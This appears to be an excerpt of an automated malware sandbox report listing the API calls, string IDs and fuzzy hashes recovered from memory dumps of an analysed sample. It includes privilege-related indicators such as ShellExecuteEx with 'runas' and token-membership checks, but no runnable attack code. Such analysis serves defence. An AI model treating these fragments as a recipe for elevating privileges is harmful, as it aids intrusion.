                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale$DefaultSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1044490935-665933166
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(0062F9F8,00000000,00401AB4), ref: 00401A1B
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,0062F9F8,00000000,00401AB4), ref: 00401A3A
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(0062D0D0,?,00000000,00008000,0062F9F8,00000000,00401AB4), ref: 00401A79
                                                                                                                                                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                                                                                                                                                                                                                                                                                  • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3782394904-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ExitMessageProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Error$Runtime error at 00000000$9@
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1220098344-1503883590
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                                                                                                                                                                                                                                                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                                                                                                                                                                                                                                                                                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 262959230-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                                                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                                                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 730355536-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                                                                                                                                                                                                  • String ID: )q@
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3660427363-2284170586
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                                                                                                                                                                                                                                                                                                                  • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CommandHandleLineModule
                                                                                                                                                                                                                                                                                                                                                                  • String ID: U1hd.@
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2123368496-2904493091
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1458359878-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047828C: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047828C: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047828C: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047828C: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC), ref: 004782E8
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047828C: GetFinalPathNameByHandleA.KERNELBASE(00000000,?,00001000,00000000,00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC), ref: 00478301
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0047828C: CloseHandle.KERNEL32(00000000,?,?,?,02122BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00478364: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004783F6,?,?,?,02122BDC,?,00478458,00000000,0047856E,?,?,-00000010,?), ref: 00478394
                                                                                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004784A8
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0047856E,?,?,-00000010,?), ref: 004784B1
                                                                                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004784FE
                                                                                                                                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478522
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00478553,00000000,00000000,000000FF,000000FF,00000000,0047854C,?,00000000,0047856E,?,?,-00000010,?), ref: 00478546
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitFinalLastModuleMultipleNameObjectsPathProcProcessShellWait
                                                                                                                                                                                                                                                                                                                                                                  • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1110972819-221126205
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: NtdllProc_Window
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4255912815-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0E6
                                                                                                                                                                                                                                                                                                                                                                  • GetVersion.KERNEL32(00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E103
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11C
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E122
                                                                                                                                                                                                                                                                                                                                                                  • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E137
                                                                                                                                                                                                                                                                                                                                                                  • FreeSid.ADVAPI32(00000000,0042E297,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E28A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
